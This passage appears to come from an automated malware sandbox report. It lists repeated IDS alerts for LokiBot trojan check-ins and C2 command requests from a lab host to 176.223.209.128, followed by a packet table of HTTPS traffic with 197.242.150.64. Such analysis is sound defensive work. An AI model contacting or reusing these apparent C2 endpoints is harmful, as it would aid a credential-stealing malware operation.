                                              11/25/21-10:55:07.557350TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2025381ET TROJAN LokiBot Checkin5067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067780192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2025381ET TROJAN LokiBot Checkin5067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.069898TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067880192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2025381ET TROJAN LokiBot Checkin5067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.535660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067980192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2025381ET TROJAN LokiBot Checkin5068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:08.993230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068080192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2025381ET TROJAN LokiBot Checkin5068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:09.501050TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068180192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2025381ET TROJAN LokiBot Checkin5068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.027946TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068280192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2025381ET TROJAN LokiBot Checkin5068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:10.499801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068380192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2025381ET TROJAN LokiBot Checkin5068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2025381ET TROJAN LokiBot Checkin5068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2025381ET TROJAN LokiBot Checkin5068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2025381ET TROJAN LokiBot Checkin5068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2025381ET TROJAN LokiBot Checkin5068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2025381ET TROJAN LokiBot Checkin5068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2025381ET TROJAN LokiBot Checkin5069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2025381ET TROJAN LokiBot Checkin5069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2025381ET TROJAN LokiBot Checkin5069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2025381ET TROJAN LokiBot Checkin5069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2025381ET TROJAN LokiBot Checkin5069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2025381ET TROJAN LokiBot Checkin5069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2025381ET TROJAN LokiBot Checkin5069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2025381ET TROJAN LokiBot Checkin5069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2025381ET TROJAN LokiBot Checkin5069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2025381ET TROJAN LokiBot Checkin5069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2025381ET TROJAN LokiBot Checkin5070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2025381ET TROJAN LokiBot Checkin5070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2025381ET TROJAN LokiBot Checkin5070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2025381ET TROJAN LokiBot Checkin5070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2025381ET TROJAN LokiBot Checkin5070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2025381ET TROJAN LokiBot Checkin5070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2025381ET TROJAN LokiBot Checkin5070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2025381ET TROJAN LokiBot Checkin5070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2025381ET TROJAN LokiBot Checkin5070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2025381ET TROJAN LokiBot Checkin5070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2025381ET TROJAN LokiBot Checkin5071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2025381ET TROJAN LokiBot Checkin5071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2025381ET TROJAN LokiBot Checkin5071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2025381ET TROJAN LokiBot Checkin5071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2025381ET TROJAN LokiBot Checkin5071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2025381ET TROJAN LokiBot Checkin5071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2025381ET TROJAN LokiBot Checkin5071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2025381ET TROJAN LokiBot Checkin5071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2025381ET TROJAN LokiBot Checkin5071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2025381ET TROJAN LokiBot Checkin5071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2025381ET TROJAN LokiBot Checkin5072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2025381ET TROJAN LokiBot Checkin5072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2025381ET TROJAN LokiBot Checkin5072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2025381ET TROJAN LokiBot Checkin5072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2025381ET TROJAN LokiBot Checkin5072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2025381ET TROJAN LokiBot Checkin5072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2025381ET TROJAN LokiBot Checkin5072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2025381ET TROJAN LokiBot Checkin5072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072780192.168.11.20176.223.209.128

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 10:47:51.315337896 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.315355062 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.315623045 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.327244043 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.327254057 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.757873058 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.758124113 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.904304028 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.904364109 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.905023098 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.905283928 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.908416033 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.951900959 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230103970 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230159998 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230254889 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230294943 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230305910 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230458021 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230494976 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.438500881 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.438532114 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.438781977 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439002991 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439160109 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439258099 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439333916 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439368010 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439486027 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439529896 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439558983 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.645909071 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.645930052 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.646119118 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.646176100 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.647803068 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648298025 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648332119 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.648364067 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648547888 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.648597956 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648950100 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.688452005 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.688659906 CET49816443192.168.11.20197.242.150.64
